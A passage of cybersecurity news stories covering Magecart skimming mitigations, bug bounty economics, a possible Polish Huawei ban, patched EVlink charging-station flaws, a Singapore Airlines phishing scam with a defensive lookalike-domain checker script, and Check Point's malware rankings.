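The caveat a practitioner will raise is that SRI only works for scripts the vendor serves unchanged; a widget that updates itself cannot be pinned, and that is exactly the kind of script that should not be on the payment page at all, which is the point Inbenta made. For scripts that must stay, a `Content-Security-Policy` with a tight `script-src` and a `connect-src`/`form-action` list limited to the payment processor blocks the exfiltration step even when the skimmer code itself loads.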
It’s unclear how many RBS and NatWest customers have experienced fraud as a result of the Ticketmaster breach, although card details from other Magecart breaches at BA and Newegg were spotted for sale on dark web sites just a week later.
This would seem to highlight the need for a speedy response from all parties in such cases, including the breached firm and relevant banks/card providers.
Many organizations may find they’re better off hiring pen testers and in-house security researchers directly than running bug bounty programs, according to new MIT research.
The MIT Press book New Solutions for Cybersecurity features a surprising analysis of bug bounty programs in the chapter Fixing a Hole: The Labor Market for Bugs.
It studied 61 HackerOne bounty programs over 23 months — including those run for Twitter, Coinbase, Square and other big names — and one Facebook program over 45 months.
It claimed that, contrary to industry hype, organizations running these programs don’t benefit from a large pool of white hats probing their products. Instead, an elite few produce the biggest volume and highest quality of bug reports across multiple products, earning the biggest slice of available rewards.
The chapter also claims that even these elite “top 1%” ethical hackers cannot make a decent wage by Western standards.
The top seven participants in the Facebook program studied made just $34,255 per year from an average of 0.87 bugs per month, while for the HackerOne dataset the estimate was $16,544 a year from 1.17 bugs per month.
There are, of course, exceptions: last week we reported that one company has upped its maximum payout for iOS zero-day exploits to $2m. However, it appears that these programs offer more of a salary top-up to Western researchers than a main source of income.
Security research firm Trail of Bits claimed the findings proved that firms should reconsider their security strategies by hiring “boffins” directly as consultants instead of running bug bounty programs.
“The authors of Fixing a Hole argue that bug bounties should be designed to incentivize the elite. They say that making bounties invite-only lowers the operational cost of managing a tsunami of trivial, non-issue, and duplicate bugs. Only 4-5% of bugs from Google, Facebook, and GitHub’s public-facing bounty programs were eligible for payment,” it argued in a blog post.
“According to the authors, a small number of bounty hunters are indispensable and hold significant power to shape the market for bug bounty programs. Based on this, hiring security consultants under terms and conditions that can be controlled seems more practical.”
That view is unsurprisingly not shared by HackerOne CEO, Marten Mickos, who said the MIT study is not representative.
“If it is based on HackerOne data, it is based only on a fragment of it. The hacker community is indeed power-law distributed,” he added in comments sent to Infosecurity.
“The top performers are orders of magnitude more productive than newcomers. The beauty is that many newcomers rise very quickly in the ranks. Within this merit-based system, there is unlimited opportunity for one with skill and will."
Report co-author and CEO of Luta Security, Katie Moussouris, doubled down on the findings, claiming that independent researchers are “better off pen testing or living the good life of in-house research staff.”
“Orgs can't #bugbounty their way to secure, same as they can't pen test their way to secure,” she tweeted. “The myth of ‘many eyes’ is convenient, but untrue as proven in both open source & bounties. Skilled bug bounty hunters rarely make a good living by Western standards.”
The Polish government is reportedly considering banning the use of Huawei products in the public sector, following the arrest of an employee of the firm on suspicion of espionage.
Wang Weijing, the firm's country sales director, was arrested on Friday along with a former Polish official who was reportedly responsible for issuing security certificates for government IT equipment.
Huawei has sought to distance itself from the spying allegations by sacking Wang. The firm has said in a statement that the individual had brought the Shenzhen giant into disrepute, but that at the same time his alleged actions “have no relation to the company.”
With national security concerns over Chinese firms growing in the West, Warsaw could be inclined to join others in cooling its relationship with the world’s biggest telecoms equipment maker.
A senior government official told Reuters it was considering a public sector ban on Huawei alongside possible legislation which could allow restrictions to be placed on firms posing a national security threat.
Cybersecurity minister, Karol Okonski, told the news site: “We will analyze whether ... our decision can include an end to the use ... of Huawei products.”
“We do not have the legal means to force private companies or citizens to stop using any IT company’s products,” he added. “It cannot be ruled out that we will consider legislative changes that would allow such a move.”
Although the firm has repeatedly hit back at claims it is a security risk, stating it is a victim of wider geopolitical tensions, the US and Australia have effectively banned its equipment from their 5G networks while New Zealand and Canada are mooting the same.
Japan has said it will prevent the firm from competing for government contracts.
In the UK, the firm has pledged $2bn to address recently aired concerns about vulnerabilities in its products, although BT will still use its equipment in the edge (radio access) parts of its 5G network. There is also the possibility that the government will go further.
“We need to decide the extent to which we are going to be comfortable with Chinese ownership of these technologies and these platforms in an environment where some of our allies have taken a very definite position,” MI6 chief Alex Younger has said.
Three different vulnerabilities in the Schneider Electric EVlink Parking electric vehicle charging station, which could have allowed an attacker to halt the charging process, have been patched, according to Positive Technologies.
Researchers found the vulnerabilities, CVE-2018-7800, CVE-2018-7801 and CVE-2018-7802, in charging stations deployed in parking facilities in several countries, including at offices, hotels, supermarkets, fleet depots and municipal sites. They reportedly affect EVLink Parking v3.2.0-12_v1 and earlier.
“Schneider Electric products are widely used in countries all over the world where the electric vehicle industry is developing. Exploitation of these vulnerabilities may lead to serious consequences,” said Paolo Emiliani, industry and SCADA research analyst at Positive Technologies, in a press release. “Attackers can actually block electric car charging and cause serious damage to the energy industry.”
According to the Positive Technologies announcement, the vulnerabilities, if exploited, would let attackers stop the charging process for vehicles plugged into affected stations, and unlock and steal the charging cables.
Specifically, CVE-2018-7800 and CVE-2018-7802 gave attackers privileged access to the charging station, so that an attacker could “stop the charging process, switch the device to the reservation mode, which would render it inaccessible to any customer until reservation mode is turned off, and even unlock the cable during the charging by manipulating the socket locking hatch, meaning attackers could walk away with the cable.”
In addition, exploiting the second vulnerability, CVE-2018-7801, gave access to the web interface, from which an attacker could manage the operating system directly, change files and configuration, or add new users or backdoors.
Schneider stated that customers can set up a firewall to block remote/external access except by authorized users as a risk mitigation strategy and recommended several cybersecurity best practices, including locating control and safety system networks and remote devices behind firewalls, and keeping those isolated from the business network.
“Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices,” the security notification stated.
After news that a bug in its software had resulted in a data breach, Singapore Airlines (SIA) today issued a warning on Facebook alerting customers to be wary of scams and phishing sites promising free airline tickets.
In what the company called a fraudulent online survey spread via WhatsApp, scammers ask users whether they have ever travelled with the airline and falsely claim that SIA is giving away free tickets to celebrate its anniversary.
In truth the survey is a scam that tries to trick SIA customers into handing over personal and credit card information. “If a recipient answers the survey questions and clicks on ... 'Claim Tickets' or 'WhatsApp,' the user will be redirected to a non-SIA website that is designed to trick the recipients into filling in their personal and credit card information. This fraudulent website is only accessible via mobile device browsers. They are shared and forwarded via WhatsApp,” SIA wrote.
The company also posted a separate warning about a lookalike site. “It has come to our attention that there is a website that claims to be from Singapore Airlines, offering free air tickets as prizes, before proceeding to request personal data,” Singapore Airlines wrote on Facebook.
“We have reported the site to be taken down and would like to advise customers to exercise discretion when revealing personal data to unverified sources. These websites, emails and calls should be verified if in doubt. Please send us details on our social media channels or via this link http://singaporeair.com/en_UK/feedback-enquiry/.
“We would also like to advise customers to be cautious of social media posts and phishing websites that appear similar to our official website singaporeair.com. Thank you.”
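SIA's warning asks customers to watch for sites that look like singaporeair.com. The triage check below is an added example, not SIA's own tooling: given reported hostnames, it strips the usual disguises (punycode/IDN labels, accented letters, digits standing in for letters, hyphenated extra words) and compares the registrable label with the brand. The candidate hostnames are constructed under the reserved .example TLD and the hypothetical confusables table is deliberately small; the only real values are the airline's own domain and brand label.

```python
import unicodedata

BRAND = "singaporeair"                      # registrable label of the airline's real domain
OFFICIAL_HOSTS = {"singaporeair.com", "www.singaporeair.com"}

# Small, illustrative confusables table: characters swapped in because they resemble brand letters.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t", "8": "b",
               "ı": "i", "ł": "l", "ø": "o"}
DIGRAPHS = {"rn": "m", "vv": "w"}


def registrable_label(host: str) -> str:
    """Second-level label (naive: fine for .com/.example, wrong for .co.uk-style public suffixes)."""
    labels = host.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalise(label: str) -> str:
    """Undo the disguises: punycode, accents, look-alike digits/letters, hyphen padding."""
    if label.startswith("xn--"):
        label = label.encode("ascii").decode("idna")
    label = unicodedata.normalize("NFKD", label)
    label = "".join(ch for ch in label if not unicodedata.combining(ch))
    label = "".join(CONFUSABLES.get(ch, ch) for ch in label)
    for pair, single in DIGRAPHS.items():
        label = label.replace(pair, single)
    return label.replace("-", "")


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; the labels are short so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(host: str):
    """Return (verdict, reason); verdict is 'official', 'lookalike' or 'unrelated'."""
    host = host.lower().strip(".")
    if host in OFFICIAL_HOSTS:
        return "official", "exact match of the real hostname"
    norm = normalise(registrable_label(host))
    if norm == BRAND:
        return "lookalike", "equals the brand after confusable/IDN normalisation"
    if BRAND in norm:
        return "lookalike", "brand embedded with extra tokens"
    distance = levenshtein(norm, BRAND)
    if distance <= 2:
        return "lookalike", f"edit distance {distance} from the brand"
    return "unrelated", f"edit distance {distance} from the brand"


# Constructed candidates (hypothetical; not domains seen in the scam). The IDN one is
# generated from an accented spelling so the block does not hard-code a punycode string.
CANDIDATES = [
    "singaporeair.com",
    "singap0reair.example",
    "singaporeair-anniversary.example",
    "sinqaporeair.example",
    "singaporeaír.example".encode("idna").decode("ascii"),   # becomes an xn-- label
    "example-holiday.example",
]

if __name__ == "__main__":
    for candidate in CANDIDATES:
        verdict, reason = classify(candidate)
        print(f"{candidate:40s} {verdict:10s} {reason}")
```

When verifying a reported site, fetch it with a mobile user agent as well as a desktop one: SIA notes the fraudulent page is only reachable from mobile browsers, so a desktop-only crawler will see nothing and may wrongly close the report.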
Cyber-criminals continue to prey on the naïveté and trust of end users. Already in 2019, Infosecurity has reported on multiple different scams, such as 60% of UK consumers leaving themselves vulnerable to New Year’s resolution online scams and the return of the WhatsApp Gold scam.
Increasingly, though, users are realizing that with online and mobile offers, nothing is ever really free. One Facebook user warned, “If it sounds/looks too good to be true, it usually is! Always delete these things after checking official websites!”
Crypto-mining malware again topped the threat index, with Coinhive holding the number one spot for the 13th consecutive month, according to Check Point's Global Threat Index for December 2018.
The threat index looks at the most common active malware variants and trends as cyber criminals evolve toward crypto-mining and multipurpose malware.
A second-stage downloader, SmokeLoader, first identified back in 2011, jumped to ninth place on the December top-10 list. “After a surge of activity in Ukraine and Japan, its global impact grew by 20%. SmokeLoader is mainly used to load other malware, such as Trickbot Banker, AZORult Infostealer and Panda Banker,” according to a press release.
“December’s report saw SmokeLoader appearing in the top 10 for the first time. Its sudden surge in prevalence reinforces the growing trend towards damaging, multipurpose malware in the Global Threat Index, with the top 10 divided equally between crypto-miners and malware that uses multiple methods to distribute numerous threats,” said Maya Horowitz, threat intelligence and research group manager at Check Point.
“The diversity of the malware in the Index means that it is critical that enterprises employ a multilayered cybersecurity strategy that protects against both established malware families and brand new threats.”
For mobile malware, Triada, a modular backdoor for Android that grants super-user privileges to downloaded malware, ranked number one.
“Check Point researchers also analyzed the most exploited cyber vulnerabilities. Holding on to first place was CVE-2017-7269, whose global impact also rose slightly to 49%, compared to 47% in November. In second place was OpenSSL TLS DTLS Heartbeat Information Disclosure, with a global impact of 42% closely followed by PHPMyAdmin Misconfiguration Code Injection with an impact of 41%,” the press release stated.
Not surprisingly, the report also reflected a rise in banking Trojans, particularly Ramnit, a data-stealing banking Trojan, which ranked eighth on the top-10 list.